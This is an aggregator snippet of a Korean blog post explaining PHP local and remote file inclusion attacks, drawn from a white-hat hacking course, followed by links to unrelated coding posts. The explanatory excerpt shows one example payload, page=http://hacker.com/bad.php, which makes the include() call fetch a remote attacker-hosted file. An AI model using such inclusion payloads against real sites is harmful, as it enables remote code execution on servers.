![[화이트헤커가 되기 위한 8가지 웹 해킹 기술]파일 인쿨루젼 공격(Local File Inclusion Attack)](http://img1.daumcdn.net/thumb/R800x0/?scode=mtistory2&fname=https%3A%2F%2Ft1.daumcdn.net%2Fcfile%2Ftistory%2F99416C33599C547223 "[화이트헤커가 되기 위한 8가지 웹 해킹 기술]파일 인쿨루젼 공격(Local File Inclusion Attack)")
본 포스트는 https://www.udemy.com/의 강좌 화이트헤커가 되기 위한 8가지 웹 해킹 기술 강좌를 바탕으로 작성했습니다. PHP 애플리케이션에서 발생하는 공격이다. PHP include()를 통해서 지정한 파일을 직접 소스코드에 삽입할 수 있기 때문이다. 파일 인클루젼은 2가지로 나뉜다. [1]로컬파일인쿨르전(LFI) - 웹서버 시스템이 이미 존재하는 파일을 인클루드 하는 것이다. [2]리모트파일인클루젼(RFI) - 더 강력한 공격으로 원격으로 외부의 파일을 인클루드 할 수 있다. [공격 시나리오] 정상적인 상황에서 page=file.php include(file.php) file.php를 인클루드 하고 있다. 이때 해커는 page=http://hacker.com/bad.php 로 인클루드..
원문링크 : [화이트헤커가 되기 위한 8가지 웹 해킹 기술]파일 인쿨루젼 공격(Local File Inclusion Attack)
![[프로그래머스] 캐시 / 2018 카카오 블라인드 1차 / 파이썬](http://img1.daumcdn.net/thumb/R800x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcYwLiW%2FbtqDY2kL7ye%2FolY5dCrIu0pQpWgXwghb71%2Fimg.png "[프로그래머스] 캐시 / 2018 카카오 블라인드 1차 / 파이썬")
![[알고리즘 문제풀이 전략] 소수 구하기 by C언어](http://img1.daumcdn.net/thumb/R800x0/?scode=mtistory2&fname=https%3A%2F%2Ft1.daumcdn.net%2Fcfile%2Ftistory%2F9924513359970F461E "[알고리즘 문제풀이 전략] 소수 구하기 by C언어")
![[Node.js] 에러처리 (Page Not Found)](http://img1.daumcdn.net/thumb/R800x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FnqjmD%2FbtqEmw10jMV%2Fi9UdxZatCIVnlTTRHDao5K%2Fimg.png "[Node.js] 에러처리 (Page Not Found)")
![[Django 오류]django.db.migrations.exceptions.InconsistentMigrationHistory: 오류 발생시](http://img1.daumcdn.net/thumb/R800x0/?scode=mtistory2&fname=https%3A%2F%2Ft1.daumcdn.net%2Fcfile%2Ftistory%2F9973A8475E7B8D942E "[Django 오류]django.db.migrations.exceptions.InconsistentMigrationHistory: 오류 발생시")
![[백준 1759 암호 만들기] 문제 해설](http://img1.daumcdn.net/thumb/R800x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FkEcke%2FbtqCXvP99tE%2F4JluHGlJQNbhJp9idPlRj0%2Fimg.png "[백준 1759 암호 만들기] 문제 해설")
네이버 블로그
티스토리
커뮤니티